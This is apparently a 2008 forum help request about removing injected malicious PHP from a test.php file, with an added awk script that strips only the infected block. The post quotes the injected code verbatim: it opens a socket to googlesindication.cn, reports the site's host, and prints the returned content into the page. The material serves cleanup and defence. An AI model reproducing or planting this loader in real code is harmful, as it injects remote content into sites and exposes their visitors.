02-25-2008
Take this example:
test.php file
##########
<?php
phpinfo();
?>
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER['HTTP_HOST'];
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
$out .= "Host: googlesindication.cn\r\n";
$out .= "Connection: Keep-Alive\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$var .= fgets($fp, 128);
}
list($headers, $content) = explode("\r\n\r\n", $var);
print $content;
fclose($fp);
}
?>
[root@server #] awk '/<\?php/,/\?>/{next}1' test.php
[root@server #]
[root@server #]
I only want to clear the malicious code, but it wipes out everything.
Please advise.
Thanks
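An added example, not part of the original post: the range pattern `/<\?php/,/\?>/` matches every PHP block, so the harmless `phpinfo()` block is dropped along with the injected one. The sketch below buffers each block and discards it only when it contains a literal marker string. The function names and the shortened sample file are constructed for illustration, and it assumes `<?php` and `?>` sit on line boundaries as they do in test.php.

```shell
#!/bin/sh
# strip_injected_php FILE MARKER
# Prints FILE with every <?php ... ?> block that contains MARKER removed.
# All other PHP blocks and all non-PHP lines pass through unchanged.
strip_injected_php() {
    awk -v marker="$2" '
        # Start of a PHP block: begin buffering instead of printing.
        !inblk && index($0, "<?php") { inblk = 1; buf = ""; bad = 0 }
        inblk {
            buf = buf $0 "\n"
            if (index($0, marker)) bad = 1   # literal match, not a regex
            if (index($0, "?>")) {           # end of block: keep or drop
                if (!bad) printf "%s", buf
                inblk = 0
            }
            next
        }
        { print }
        # Unterminated block at EOF: keep it unless it carried the marker.
        END { if (inblk && !bad) printf "%s", buf }
    ' "$1"
}

# Constructed sample modelled on the test.php shown in the post (shortened).
make_sample() {
    cat <<'EOF'
<?php
phpinfo();
?>
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
?>
EOF
}

# Runs the filter over the sample and prints what survives.
demo() {
    tmp=$(mktemp) || return 1
    make_sample > "$tmp"
    strip_injected_php "$tmp" 'googlesindication.cn'
    rm -f "$tmp"
}
```

Write the output to a new file and `diff` it against the original before replacing anything, so a block removed by mistake is easy to spot.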